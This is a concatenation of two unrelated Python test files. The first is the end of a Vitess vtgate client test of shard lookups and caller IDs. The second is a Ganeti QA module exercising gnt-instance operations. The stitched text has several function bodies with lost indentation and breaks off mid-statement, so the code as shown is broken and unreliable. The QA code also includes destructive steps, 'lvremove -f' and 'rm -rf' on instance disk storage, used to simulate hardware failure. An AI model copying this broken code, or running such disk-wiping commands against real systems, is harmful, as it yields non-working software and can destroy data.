    # 0x20... is outside every shard's keyrange, so the lookup must fail.
    with self.assertRaises(ValueError):
      big.keyspace_id_to_shard_name_for_db_type(0x2000000000000000, 'replica')

    # small has no shards
    small = self.conn.get_srv_keyspace('small')
    self.assertEquals(small.name, 'small')
    self.assertEquals(small.sharding_col_name, '')
    self.assertEquals(small.sharding_col_type, keyrange_constants.KIT_UNSET)
    self.assertEquals(small.served_from, {})
    self.assertEquals(small.get_shards('replica'), [])
    self.assertEquals(small.get_shard_count('replica'), 0)
    with self.assertRaises(ValueError):
      small.keyspace_id_to_shard_name_for_db_type(0x6000000000000000, 'replica')

  def test_effective_caller_id(self):
    """Test that the passed in effective_caller_id is parsed correctly.

    Pass a special sql query that sends the expected
    effective_caller_id through different vtgate interfaces. Make sure
    the good_effective_caller_id works, and the
    bad_effective_caller_id raises a DatabaseError.
    """
    # Special query that makes vtgateclienttest match effective_caller_id.
    effective_caller_id_test_query = (
        'callerid://{"principal":"pr", "component":"co", "subcomponent":"su"}')
    good_effective_caller_id = vtgate_client.CallerID(
        principal='pr', component='co', subcomponent='su')
    bad_effective_caller_id = vtgate_client.CallerID(
        principal='pr_wrong', component='co_wrong', subcomponent='su_wrong')

    def check_good_and_bad_effective_caller_ids(cursor, cursor_execute_method):
      # vtgateclienttest always raises; a matching caller id is reported
      # with 'SUCCESS:' inside the error message, a mismatch without it.
      cursor.set_effective_caller_id(good_effective_caller_id)
      with self.assertRaises(dbexceptions.DatabaseError) as cm:
        cursor_execute_method(cursor)
      self.assertIn('SUCCESS:', str(cm.exception))
      cursor.set_effective_caller_id(bad_effective_caller_id)
      with self.assertRaises(dbexceptions.DatabaseError) as cm:
        cursor_execute_method(cursor)
      self.assertNotIn('SUCCESS:', str(cm.exception))

    def cursor_execute_keyspace_ids_method(cursor):
      cursor.execute(effective_caller_id_test_query, {})

    check_good_and_bad_effective_caller_ids(
        self._open_keyspace_ids_cursor(), cursor_execute_keyspace_ids_method)

    def cursor_execute_key_ranges_method(cursor):
      cursor.execute(effective_caller_id_test_query, {})

    check_good_and_bad_effective_caller_ids(
        self._open_keyranges_cursor(), cursor_execute_key_ranges_method)

    def cursor_execute_entity_ids_method(cursor):
      cursor.execute(
          effective_caller_id_test_query, {},
          entity_keyspace_id_map={1: self.KEYSPACE_ID_0X80},
          entity_column_name='user_id')

    check_good_and_bad_effective_caller_ids(
        self.conn.cursor('keyspace', 'master'),
        cursor_execute_entity_ids_method)

    def cursor_execute_batch_keyspace_ids_method(cursor):
      cursor.executemany(
          sql=None,
          params_list=[dict(
              sql=effective_caller_id_test_query, bind_variables={},
              keyspace='keyspace',
              keyspace_ids=[self.KEYSPACE_ID_0X80])])

    check_good_and_bad_effective_caller_ids(
        self._open_batch_cursor(), cursor_execute_batch_keyspace_ids_method)

    def cursor_execute_batch_shard_method(cursor):
      cursor.executemany(
          sql=None,
          params_list=[dict(
              sql=effective_caller_id_test_query, bind_variables={},
              keyspace='keyspace',
              shards=[keyrange_constants.SHARD_ZERO])])

    check_good_and_bad_effective_caller_ids(
        self._open_batch_cursor(), cursor_execute_batch_shard_method)

    def cursor_stream_execute_keyspace_ids_method(cursor):
      cursor.execute(sql=effective_caller_id_test_query, bind_variables={})

    check_good_and_bad_effective_caller_ids(
        self._open_stream_keyspace_ids_cursor(),
        cursor_stream_execute_keyspace_ids_method)

    def cursor_stream_execute_keyranges_method(cursor):
      cursor.execute(sql=effective_caller_id_test_query, bind_variables={})

    check_good_and_bad_effective_caller_ids(
        self._open_stream_keyranges_cursor(),
        cursor_stream_execute_keyranges_method)
if __name__ == '__main__':
  # utils.main() handles option parsing and the unittest run.
  utils.main()
#
#
# Copyright (C) 2007, 2011, 2012, 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Instance related QA tests.
"""
import os
import re
import time
from ganeti import utils
from ganeti import constants
from ganeti import query
from ganeti import pathutils
import qa_config
import qa_utils
import qa_error
from qa_utils import AssertCommand, AssertEqual
from qa_utils import InstanceCheck, INST_DOWN, INST_UP, FIRST_ARG, RETURN_VALUE
from qa_instance_utils import CheckSsconfInstanceList, \
CreateInstanceDrbd8, \
CreateInstanceByDiskTemplate, \
CreateInstanceByDiskTemplateOneNode, \
GetGenericAddParameters
def _GetDiskStatePath(disk):
return "/sys/block/%s/device/state" % disk
def GetInstanceInfo(instance):
  """Return information about the actual state of an instance.

  @type instance: string
  @param instance: the instance name
  @return: a dictionary with the following keys:
      - "nodes": instance nodes, a list of strings
      - "volumes": instance volume IDs, a list of strings
      - "drbd-minors": DRBD minors used by the instance, a dictionary where
        keys are nodes, and values are lists of integers (or an empty
        dictionary for non-DRBD instances)
      - "disk-template": instance disk template
      - "storage-type": storage type associated with the instance disk template

  """
  # One node name, optionally followed by a parenthesized group annotation.
  node_elem = r"([^,()]+)(?:\s+\([^)]+\))?"
  # re_nodelist matches a list of nodes returned by gnt-instance info, e.g.:
  #  node1.fqdn
  #  node2.fqdn,node3.fqdn
  #  node4.fqdn (group mygroup, group UUID 01234567-abcd-0123-4567-0123456789ab)
  # FIXME This works with no more than 2 secondaries
  re_nodelist = re.compile(node_elem + "(?:," + node_elem + ")?$")

  info = qa_utils.GetObjectInfo(["gnt-instance", "info", instance])[0]
  nodes = []
  for nodeinfo in info["Nodes"]:
    if "primary" in nodeinfo:
      nodes.append(nodeinfo["primary"])
    elif "secondaries" in nodeinfo:
      nodestr = nodeinfo["secondaries"]
      if nodestr:
        m = re_nodelist.match(nodestr)
        if m:
          nodes.extend(filter(None, m.groups()))
        else:
          # Fall back to the raw string if the regex does not match.
          nodes.append(nodestr)

  disk_template = info["Disk template"]
  if not disk_template:
    raise qa_error.Error("Can't get instance disk template")
  storage_type = constants.MAP_DISK_TEMPLATE_STORAGE_TYPE[disk_template]

  # Matches e.g. "node1.fqdn, minor=3" from the DRBD disk description.
  re_drbdnode = re.compile(r"^([^\s,]+),\s+minor=([0-9]+)$")
  vols = []
  drbd_min = {}
  for (count, diskinfo) in enumerate(info["Disks"]):
    (dtype, _) = diskinfo["disk/%s" % count].split(",", 1)
    if dtype == constants.DT_DRBD8:
      # DRBD disks: collect the backing volumes and the per-node minors.
      for child in diskinfo["child devices"]:
        vols.append(child["logical_id"])
      for key in ["nodeA", "nodeB"]:
        m = re_drbdnode.match(diskinfo[key])
        if not m:
          raise qa_error.Error("Cannot parse DRBD info: %s" % diskinfo[key])
        node = m.group(1)
        minor = int(m.group(2))
        minorlist = drbd_min.setdefault(node, [])
        minorlist.append(minor)
    elif dtype == constants.DT_PLAIN:
      vols.append(diskinfo["logical_id"])

  assert nodes
  assert len(nodes) < 2 or vols
  return {
    "nodes": nodes,
    "volumes": vols,
    "drbd-minors": drbd_min,
    "disk-template": disk_template,
    "storage-type": storage_type,
    }
def _DestroyInstanceDisks(instance):
  """Remove all the backend disks of an instance.

  This is used to simulate HW errors (dead nodes, broken disks...); the
  configuration of the instance is not affected.
  @type instance: dictionary
  @param instance: the instance

  """
  info = GetInstanceInfo(instance.name)
  # FIXME: destruction/removal should be part of the disk class
  if info["storage-type"] == constants.ST_LVM_VG:
    # LVM-backed: remove the logical volumes on every instance node.
    vols = info["volumes"]
    for node in info["nodes"]:
      AssertCommand(["lvremove", "-f"] + vols, node=node)
  elif info["storage-type"] in (constants.ST_FILE, constants.ST_SHARED_FILE):
    # Note that this works for both file and sharedfile, and this is intended.
    storage_dir = qa_config.get("file-storage-dir",
                                pathutils.DEFAULT_FILE_STORAGE_DIR)
    idir = os.path.join(storage_dir, instance.name)
    for node in info["nodes"]:
      AssertCommand(["rm", "-rf", idir], node=node)
  elif info["storage-type"] == constants.ST_DISKLESS:
    # Nothing to destroy for diskless instances.
    pass
def _GetInstanceField(instance, field):
  """Fetch a single field of an instance via "gnt-instance list".

  @type instance: string
  @param instance: Instance name
  @type field: string
  @param field: Name of the field
  @rtype: string

  """
  list_cmd = ["gnt-instance", "list", "--no-headers",
              "--units", "m", "-o", field, instance]
  quoted_cmd = utils.ShellQuoteArgs(list_cmd)
  master_node = qa_config.GetMasterNode()
  raw_output = qa_utils.GetCommandOutput(master_node.primary, quoted_cmd)
  return raw_output.strip()
def _GetBoolInstanceField(instance, field):
  """Get the Boolean value of a field of an instance.

  @type instance: string
  @param instance: Instance name
  @type field: string
  @param field: Name of the field
  @rtype: bool

  """
  raw_value = _GetInstanceField(instance, field)
  # gnt-instance renders booleans as "Y"/"N"; anything else is an error.
  if raw_value == "Y":
    return True
  if raw_value == "N":
    return False
  raise qa_error.Error("Field %s of instance %s has a non-Boolean value:"
                       " %s" % (field, instance, raw_value))
def _GetNumInstanceField(instance, field):
  """Get a numeric value of a field of an instance.

  @type instance: string
  @param instance: Instance name
  @type field: string
  @param field: Name of the field
  @rtype: int or float

  """
  raw_value = _GetInstanceField(instance, field)
  # Prefer an integer interpretation, then fall back to float.
  for converter in (int, float):
    try:
      return converter(raw_value)
    except ValueError:
      pass
  raise qa_error.Error("Field %s of instance %s has a non-numeric value:"
                       " %s" % (field, instance, raw_value))
def GetInstanceSpec(instance, spec):
  """Return the current spec for the given parameter.

  @type instance: string
  @param instance: Instance name
  @type spec: string
  @param spec: one of the supported parameters: "memory-size", "cpu-count",
      "disk-count", "disk-size", "nic-count"
  @rtype: tuple
  @return: (minspec, maxspec); minspec and maxspec can be different only for
      memory and disk size

  """
  specmap = {
    "memory-size": ["be/minmem", "be/maxmem"],
    "cpu-count": ["vcpus"],
    "disk-count": ["disk.count"],
    # Placeholder entry: the "disk-size" branch below builds the real
    # per-disk field names, so this value is never used directly.
    "disk-size": ["disk.size/ "],
    "nic-count": ["nic.count"],
    }
  # For disks, first we need the number of disks
  if spec == "disk-size":
    (numdisk, _) = GetInstanceSpec(instance, "disk-count")
    fields = ["disk.size/%s" % k for k in range(0, numdisk)]
  else:
    assert spec in specmap, "%s not in %s" % (spec, specmap)
    fields = specmap[spec]
  values = [_GetNumInstanceField(instance, f) for f in fields]
  return (min(values), max(values))
def IsFailoverSupported(instance):
  """Whether the instance's disk template supports gnt-instance failover."""
  return instance.disk_template in constants.DTS_MIRRORED
def IsMigrationSupported(instance):
  """Whether the instance's disk template supports gnt-instance migrate."""
  return instance.disk_template in constants.DTS_MIRRORED
def IsDiskReplacingSupported(instance):
  """Whether the instance supports replace-disks (DRBD only)."""
  return instance.disk_template == constants.DT_DRBD8
def IsDiskSupported(instance):
  """Whether the instance has any disks at all (i.e. is not diskless)."""
  return instance.disk_template != constants.DT_DISKLESS
def TestInstanceAddWithPlainDisk(nodes, fail=False):
  """gnt-instance add -t plain"""
  # Only run when the plain template is enabled in this QA configuration.
  if constants.DT_PLAIN in qa_config.GetEnabledDiskTemplates():
    instance = CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_PLAIN,
                                                   fail=fail)
    if not fail:
      qa_utils.RunInstanceCheck(instance, True)
    return instance
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddWithDrbdDisk(nodes):
  """gnt-instance add -t drbd"""
  # Only run when the drbd template is enabled in this QA configuration.
  if constants.DT_DRBD8 in qa_config.GetEnabledDiskTemplates():
    return CreateInstanceDrbd8(nodes)
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddFile(nodes):
  """gnt-instance add -t file"""
  assert len(nodes) == 1
  if constants.DT_FILE in qa_config.GetEnabledDiskTemplates():
    return CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_FILE)
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddSharedFile(nodes):
  """gnt-instance add -t sharedfile"""
  assert len(nodes) == 1
  if constants.DT_SHARED_FILE in qa_config.GetEnabledDiskTemplates():
    return CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_SHARED_FILE)
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddDiskless(nodes):
  """gnt-instance add -t diskless"""
  assert len(nodes) == 1
  if constants.DT_DISKLESS in qa_config.GetEnabledDiskTemplates():
    return CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_DISKLESS)
@InstanceCheck(None, INST_DOWN, FIRST_ARG)
def TestInstanceRemove(instance):
"""gnt-instance remove"""
AssertCommand(["gnt-instance", "remove", "-f", instance.name])
@InstanceCheck(INST_DOWN, INST_UP, FIRST_ARG)
def TestInstanceStartup(instance):
  """gnt-instance startup"""
  AssertCommand(["gnt-instance", "startup", instance.name])
@InstanceCheck(INST_UP, INST_DOWN, FIRST_ARG)
def TestInstanceShutdown(instance):
  """gnt-instance shutdown"""
  AssertCommand(["gnt-instance", "shutdown", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceReboot(instance):
  """gnt-instance reboot"""
  options = qa_config.get("options", {})
  reboot_types = options.get("reboot-types", constants.REBOOT_TYPES)
  name = instance.name
  # Exercise every configured reboot type on the running instance.
  for rtype in reboot_types:
    AssertCommand(["gnt-instance", "reboot", "--type=%s" % rtype, name])

  # A reboot of a stopped instance must start it again.
  AssertCommand(["gnt-instance", "shutdown", name])
  qa_utils.RunInstanceCheck(instance, False)
  AssertCommand(["gnt-instance", "reboot", name])

  master = qa_config.GetMasterNode()
  cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", name]
  result_output = qa_utils.GetCommandOutput(master.primary,
                                            utils.ShellQuoteArgs(cmd))
  AssertEqual(result_output.strip(), constants.INSTST_RUNNING)
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceReinstall(instance):
  """gnt-instance reinstall"""
  if instance.disk_template == constants.DT_DISKLESS:
    print qa_utils.FormatInfo("Test not supported for diskless instances")
    return

  AssertCommand(["gnt-instance", "reinstall", "-f", instance.name])

  # Test with non-existent OS definition; the command must fail.
  AssertCommand(["gnt-instance", "reinstall", "-f",
                 "--os-type=NonExistantOsForQa",
                 instance.name],
                fail=True)
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceRenameAndBack(rename_source, rename_target):
  """gnt-instance rename

  This must leave the instance with the original name, not the target
  name.

  """
  CheckSsconfInstanceList(rename_source)

  # first do a rename to a different actual name, expecting it to fail
  qa_utils.AddToEtcHosts(["meeeeh-not-exists", rename_target])
  try:
    AssertCommand(["gnt-instance", "rename", rename_source, rename_target],
                  fail=True)
    CheckSsconfInstanceList(rename_source)
  finally:
    qa_utils.RemoveFromEtcHosts(["meeeeh-not-exists", rename_target])

  info = GetInstanceInfo(rename_source)

  # Check instance volume tags correctly updated. Note that this check is lvm
  # specific, so we skip it for non-lvm-based instances.
  # FIXME: This will need updating when instances will be able to have
  # different disks living on storage pools with etherogeneous storage types.
  # FIXME: This check should be put inside the disk/storage class themselves,
  # rather than explicitly called here.
  if info["storage-type"] == constants.ST_LVM_VG:
    # In the lvm world we can check for tags on the logical volume
    tags_cmd = ("lvs -o tags --noheadings %s | grep " %
                (" ".join(info["volumes"]), ))
  else:
    # Other storage types don't have tags, so we use an always failing command,
    # to make sure it never gets executed
    tags_cmd = "false"

  # and now rename instance to rename_target...
  AssertCommand(["gnt-instance", "rename", rename_source, rename_target])
  CheckSsconfInstanceList(rename_target)
  qa_utils.RunInstanceCheck(rename_source, False)
  qa_utils.RunInstanceCheck(rename_target, False)

  # NOTE: tags might not be the exactly as the instance name, due to
  # charset restrictions; hence the test might be flaky
  if (rename_source != rename_target and
      info["storage-type"] == constants.ST_LVM_VG):
    for node in info["nodes"]:
      AssertCommand(tags_cmd + rename_source, node=node, fail=True)
      AssertCommand(tags_cmd + rename_target, node=node, fail=False)

  # and back
  AssertCommand(["gnt-instance", "rename", rename_target, rename_source])
  CheckSsconfInstanceList(rename_source)
  qa_utils.RunInstanceCheck(rename_target, False)

  if (rename_source != rename_target and
      info["storage-type"] == constants.ST_LVM_VG):
    for node in info["nodes"]:
      AssertCommand(tags_cmd + rename_source, node=node, fail=False)
      AssertCommand(tags_cmd + rename_target, node=node, fail=True)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceFailover(instance):
  """gnt-instance failover"""
  if not IsFailoverSupported(instance):
    print qa_utils.FormatInfo("Instance doesn't support failover, skipping"
                              " test")
    return

  cmd = ["gnt-instance", "failover", "--force", instance.name]

  # failover ...
  AssertCommand(cmd)
  qa_utils.RunInstanceCheck(instance, True)

  # ... and back
  AssertCommand(cmd)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceMigrate(instance, toggle_always_failover=True):
  """gnt-instance migrate"""
  if not IsMigrationSupported(instance):
    print qa_utils.FormatInfo("Instance doesn't support migration, skipping"
                              " test")
    return

  cmd = ["gnt-instance", "migrate", "--force", instance.name]
  af_par = constants.BE_ALWAYS_FAILOVER
  af_field = "be/" + constants.BE_ALWAYS_FAILOVER
  # Remember the initial always_failover setting so it can be restored.
  af_init_val = _GetBoolInstanceField(instance.name, af_field)

  # migrate ...
  AssertCommand(cmd)
  # TODO: Verify the choice between failover and migration
  qa_utils.RunInstanceCheck(instance, True)

  # ... and back (possibly with always_failover toggled)
  if toggle_always_failover:
    AssertCommand(["gnt-instance", "modify", "-B",
                   ("%s=%s" % (af_par, not af_init_val)),
                   instance.name])
  AssertCommand(cmd)
  # TODO: Verify the choice between failover and migration
  qa_utils.RunInstanceCheck(instance, True)
  if toggle_always_failover:
    AssertCommand(["gnt-instance", "modify", "-B",
                   ("%s=%s" % (af_par, af_init_val)), instance.name])

  # TODO: Split into multiple tests
  # Migrating a stopped instance must fail unless failover is allowed.
  AssertCommand(["gnt-instance", "shutdown", instance.name])
  qa_utils.RunInstanceCheck(instance, False)
  AssertCommand(cmd, fail=True)
  AssertCommand(["gnt-instance", "migrate", "--force", "--allow-failover",
                 instance.name])
  AssertCommand(["gnt-instance", "start", instance.name])
  AssertCommand(cmd)
  # @InstanceCheck enforces the check that the instance is running
  qa_utils.RunInstanceCheck(instance, True)

  AssertCommand(["gnt-instance", "modify", "-B",
                 ("%s=%s" %
                  (constants.BE_ALWAYS_FAILOVER, constants.VALUE_TRUE)),
                 instance.name])

  AssertCommand(cmd)
  qa_utils.RunInstanceCheck(instance, True)
  # TODO: Verify that a failover has been done instead of a migration

  # TODO: Verify whether the default value is restored here (not hardcoded)
  AssertCommand(["gnt-instance", "modify", "-B",
                 ("%s=%s" %
                  (constants.BE_ALWAYS_FAILOVER, constants.VALUE_FALSE)),
                 instance.name])

  AssertCommand(cmd)
  qa_utils.RunInstanceCheck(instance, True)
def TestInstanceInfo(instance):
  """gnt-instance info"""
  AssertCommand(["gnt-instance", "info", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceModify(instance):
  """gnt-instance modify"""
  default_hv = qa_config.GetDefaultHypervisor()

  # Assume /sbin/init exists on all systems
  test_kernel = "/sbin/init"
  test_initrd = test_kernel

  orig_maxmem = qa_config.get(constants.BE_MAXMEM)
  orig_minmem = qa_config.get(constants.BE_MINMEM)
  #orig_bridge = qa_config.get("bridge", "xen-br0")

  # Each entry is one gnt-instance modify invocation; memory/vcpu values are
  # restored to their configured values afterwards.
  args = [
    ["-B", "%s=128" % constants.BE_MINMEM],
    ["-B", "%s=128" % constants.BE_MAXMEM],
    ["-B", "%s=%s,%s=%s" % (constants.BE_MINMEM, orig_minmem,
                            constants.BE_MAXMEM, orig_maxmem)],
    ["-B", "%s=2" % constants.BE_VCPUS],
    ["-B", "%s=1" % constants.BE_VCPUS],
    ["-B", "%s=%s" % (constants.BE_VCPUS, constants.VALUE_DEFAULT)],
    ["-B", "%s=%s" % (constants.BE_ALWAYS_FAILOVER, constants.VALUE_TRUE)],
    ["-B", "%s=%s" % (constants.BE_ALWAYS_FAILOVER, constants.VALUE_DEFAULT)],
    ["-H", "%s=%s" % (constants.HV_KERNEL_PATH, test_kernel)],
    ["-H", "%s=%s" % (constants.HV_KERNEL_PATH, constants.VALUE_DEFAULT)],

    # TODO: bridge tests
    #["--bridge", "xen-br1"],
    #["--bridge", orig_bridge],
    ]

  # Hypervisor-specific parameter variations.
  if default_hv == constants.HT_XEN_PVM:
    args.extend([
      ["-H", "%s=%s" % (constants.HV_INITRD_PATH, test_initrd)],
      ["-H", "no_%s" % (constants.HV_INITRD_PATH, )],
      ["-H", "%s=%s" % (constants.HV_INITRD_PATH, constants.VALUE_DEFAULT)],
      ])
  elif default_hv == constants.HT_XEN_HVM:
    args.extend([
      ["-H", "%s=acn" % constants.HV_BOOT_ORDER],
      ["-H", "%s=%s" % (constants.HV_BOOT_ORDER, constants.VALUE_DEFAULT)],
      ])
  elif default_hv == constants.HT_KVM and \
      qa_config.TestEnabled("instance-device-hotplug"):
    # Hot-plug a NIC and a disk, then remove them again.
    args.extend([
      ["--net", "-1:add", "--hotplug"],
      ["--net", "-1:modify,mac=aa:bb:cc:dd:ee:ff", "--hotplug", "--force"],
      ["--net", "-1:remove", "--hotplug"],
      ["--disk", "-1:add,size=1G", "--hotplug"],
      ["--disk", "-1:remove", "--hotplug"],
      ])

  for alist in args:
    AssertCommand(["gnt-instance", "modify"] + alist + [instance.name])

  # check no-modify
  AssertCommand(["gnt-instance", "modify", instance.name], fail=True)

  # Marking offline while instance is running must fail...
  AssertCommand(["gnt-instance", "modify", "--offline", instance.name],
                fail=True)

  # ...while making it online is ok, and should work
  AssertCommand(["gnt-instance", "modify", "--online", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceModifyPrimaryAndBack(instance, currentnode, othernode):
  """gnt-instance modify --new-primary

  This will leave the instance on its original primary node, not other node.
  """
  if instance.disk_template != constants.DT_FILE:
    print qa_utils.FormatInfo("Test only supported for the file disk template")
    return

  cluster_name = qa_config.get("name")

  name = instance.name
  current = currentnode.primary
  other = othernode.primary

  filestorage = qa_config.get("file-storage-dir",
                              pathutils.DEFAULT_FILE_STORAGE_DIR)
  disk = os.path.join(filestorage, name)

  # Changing the primary of a running instance must fail
  AssertCommand(["gnt-instance", "modify", "--new-primary=%s" % other, name],
                fail=True)
  AssertCommand(["gnt-instance", "shutdown", name])
  # Copy the disk files to the new primary; the -o options disable
  # interactive host-key prompts using the cluster's known-hosts file
  AssertCommand(["scp", "-oGlobalKnownHostsFile=%s" %
                 pathutils.SSH_KNOWN_HOSTS_FILE,
                 "-oCheckHostIp=no", "-oStrictHostKeyChecking=yes",
                 "-oHashKnownHosts=no", "-oHostKeyAlias=%s" % cluster_name,
                 "-r", disk, "%s:%s" % (other, filestorage)], node=current)
  AssertCommand(["gnt-instance", "modify", "--new-primary=%s" % other, name])
  AssertCommand(["gnt-instance", "startup", name])

  # and back: remove the copied disk files and restore the original primary
  AssertCommand(["gnt-instance", "shutdown", name])
  AssertCommand(["rm", "-rf", disk], node=other)
  AssertCommand(["gnt-instance", "modify", "--new-primary=%s" % current, name])
  AssertCommand(["gnt-instance", "startup", name])
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceStoppedModify(instance):
  """gnt-instance modify (stopped instance)"""
  name = instance.name

  # Each step: (arguments after "gnt-instance", whether failure is expected)
  steps = [
    # Instance was not marked offline; try marking it online once more
    (["modify", "--online", name], False),
    # Mark instance as offline
    (["modify", "--offline", name], False),
    # When the instance is offline shutdown should only work with --force,
    # while start should never work
    (["shutdown", name], True),
    (["shutdown", "--force", name], False),
    (["start", name], True),
    (["start", "--force", name], True),
    # Also do offline to offline
    (["modify", "--offline", name], False),
    # And online again
    (["modify", "--online", name], False),
    ]
  for cmd_args, expect_fail in steps:
    AssertCommand(["gnt-instance"] + cmd_args, fail=expect_fail)
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceConvertDiskToPlain(instance, inodes):
  """gnt-instance modify -t

  Converts a DRBD instance to plain and back again; skipped for any other
  disk template.

  @param inodes: current nodes of the instance (primary, secondary)
  """
  name = instance.name
  template = instance.disk_template
  if template != constants.DT_DRBD8:
    print qa_utils.FormatInfo("Unsupported template %s, skipping conversion"
                              " test" % template)
    return

  assert len(inodes) == 2
  AssertCommand(["gnt-instance", "modify", "-t", constants.DT_PLAIN, name])
  # Converting back to DRBD requires explicitly naming the secondary node
  AssertCommand(["gnt-instance", "modify", "-t", constants.DT_DRBD8,
                 "-n", inodes[1].primary, name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceModifyDisks(instance):
  """gnt-instance modify --disk

  Adds one disk (with and without the "spindles" parameter; exactly one of
  the two must succeed depending on whether spindles are supported) and
  removes it again.
  """
  if not IsDiskSupported(instance):
    print qa_utils.FormatInfo("Instance doesn't support disks, skipping test")
    return

  disk_conf = qa_config.GetDiskOptions()[-1]
  size = disk_conf.get("size")
  name = instance.name
  build_cmd = lambda arg: ["gnt-instance", "modify", "--disk", arg, name]
  if qa_config.AreSpindlesSupported():
    spindles = disk_conf.get("spindles")
    spindles_supported = True
  else:
    # Any number is good for spindles in this case
    spindles = 1
    spindles_supported = False
  AssertCommand(build_cmd("add:size=%s,spindles=%s" % (size, spindles)),
                fail=not spindles_supported)
  AssertCommand(build_cmd("add:size=%s" % size),
                fail=spindles_supported)
  # Exactly one of the above commands has succeeded, so we need one remove
  AssertCommand(build_cmd("remove"))
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceGrowDisk(instance):
  """gnt-instance grow-disk

  For every configured disk: grow by the configured amount, verify that
  "shrinking" back to the old size with --absolute fails, then grow to
  old size + 2 * growth with --absolute.
  """
  if instance.disk_template == constants.DT_DISKLESS:
    print qa_utils.FormatInfo("Test not supported for diskless instances")
    return

  name = instance.name
  disks = qa_config.GetDiskOptions()
  all_size = [d.get("size") for d in disks]
  all_grow = [d.get("growth") for d in disks]

  if not all_grow:
    # missing disk sizes but instance grow disk has been enabled,
    # let's set fixed/nominal growth
    # NOTE(review): this branch only triggers when the list itself is empty;
    # individual entries may still be None if a disk lacks a "growth" key --
    # confirm QA configs always define "growth" per disk
    all_grow = ["128M" for _ in all_size]

  for idx, (size, grow) in enumerate(zip(all_size, all_grow)):
    # succeed in grow by amount
    AssertCommand(["gnt-instance", "grow-disk", name, str(idx), grow])
    # fail in grow to the old size
    AssertCommand(["gnt-instance", "grow-disk", "--absolute", name, str(idx),
                   size], fail=True)
    # succeed to grow to old size + 2 * growth
    int_size = utils.ParseUnit(size)
    int_grow = utils.ParseUnit(grow)
    AssertCommand(["gnt-instance", "grow-disk", "--absolute", name, str(idx),
                   str(int_size + 2 * int_grow)])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceDeviceNames(instance):
  """gnt-instance modify with named devices

  Exercises adding, removing and renaming disks and NICs by name.
  """
  if instance.disk_template == constants.DT_DISKLESS:
    print qa_utils.FormatInfo("Test not supported for diskless instances")
    return

  name = instance.name
  for dev_type in ["disk", "net"]:
    if dev_type == "disk":
      options = ",size=512M"
      if qa_config.AreSpindlesSupported():
        options += ",spindles=1"
    else:
      options = ""
    # succeed in adding a device named 'test_device'
    AssertCommand(["gnt-instance", "modify",
                   "--%s=-1:add,name=test_device%s" % (dev_type, options),
                   name])
    # succeed in removing the 'test_device'
    AssertCommand(["gnt-instance", "modify",
                   "--%s=test_device:remove" % dev_type,
                   name])
    # fail to add two devices with the same name
    AssertCommand(["gnt-instance", "modify",
                   "--%s=-1:add,name=test_device%s" % (dev_type, options),
                   "--%s=-1:add,name=test_device%s" % (dev_type, options),
                   name], fail=True)
    # fail to add a device with an invalid (purely numeric) name
    AssertCommand(["gnt-instance", "modify",
                   "--%s=-1:add,name=2%s" % (dev_type, options),
                   name], fail=True)

  # Rename disks
  disks = qa_config.GetDiskOptions()
  disk_names = [d.get("name") for d in disks]
  for idx, disk_name in enumerate(disk_names):
    # Refer to disk by idx
    AssertCommand(["gnt-instance", "modify",
                   "--disk=%s:modify,name=renamed" % idx,
                   name])
    # Refer to disk by name and rename it back to its original name
    AssertCommand(["gnt-instance", "modify",
                   "--disk=renamed:modify,name=%s" % disk_name,
                   name])
  if len(disks) >= 2:
    # fail to rename two disks to the same name
    AssertCommand(["gnt-instance", "modify",
                   "--disk=0:modify,name=same_name",
                   "--disk=1:modify,name=same_name",
                   name], fail=True)
def TestInstanceList():
  """gnt-instance list"""
  # Run the generic query test over all known instance fields
  instance_fields = query.INSTANCE_FIELDS.keys()
  qa_utils.GenericQueryTest("gnt-instance", instance_fields)
def TestInstanceListFields():
  """gnt-instance list-fields"""
  # Verify list-fields reports every known instance field
  instance_fields = query.INSTANCE_FIELDS.keys()
  qa_utils.GenericQueryFieldsTest("gnt-instance", instance_fields)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceConsole(instance):
  """gnt-instance console"""
  # Only print the console command, do not actually attach to the console
  console_cmd = ["gnt-instance", "console", "--show-cmd", instance.name]
  AssertCommand(console_cmd)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestReplaceDisks(instance, curr_nodes, other_nodes):
  """gnt-instance replace-disks

  @param curr_nodes: current (primary, secondary) nodes of the instance
  @param other_nodes: one spare node used as a temporary new secondary
  """
  def buildcmd(args):
    # Helper: "gnt-instance replace-disks <args> <instance name>"
    cmd = ["gnt-instance", "replace-disks"]
    cmd.extend(args)
    cmd.append(instance.name)
    return cmd

  if not IsDiskReplacingSupported(instance):
    print qa_utils.FormatInfo("Instance doesn't support disk replacing,"
